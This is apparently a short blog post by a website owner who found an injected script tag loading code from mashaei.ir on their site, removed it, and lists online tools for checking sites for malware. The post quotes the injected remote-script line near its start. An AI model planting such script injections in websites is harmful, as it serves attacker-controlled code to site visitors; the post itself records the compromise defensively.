The code was something like:
script src=http://mashaei.ir/AWStats/admin.php /script
I did not check it, but I think it is some nasty code. I discovered this code because I saw in the status bar that the browser was waiting for mashaei.ir. For what? Who is Mashaei? Well that is a simple question, take a look at: http://en.wikipedia.org/wiki/Esfandiar_Rahim_Mashaei but do not visit his site!
I removed all rubish, protected my site a litte more and watched my site more closely. I suggest that you ask Google for advise via http://google.com/safebrowsing/diagnostic?site=mashaei.ir
There are other sites, but they all state that mashaei.ir is okay. I think that that is not correct.
- McAfee's SiteAdvisor: http://www.siteadvisor.com/sites/mashaei.ir
- Finjan Vital Security: http://www.finjan.com/Content.aspx?id=574&surl=mashaei.ir
- Norton Safe Web: http://safeweb.norton.com/report/show?url=mashaei.ir&x=0&y=
There are luckily other ways to test your site for malware.
- If your site contains valid HTML, check at a regular base http://validator.w3.org/check?uri=www.mashaei.ir
- If you know which URL's are valid, check for strange browser requests with http://tools.pingdom.com/?url=www.mashaei.ir
- Let your site check by http://www.dasient.com/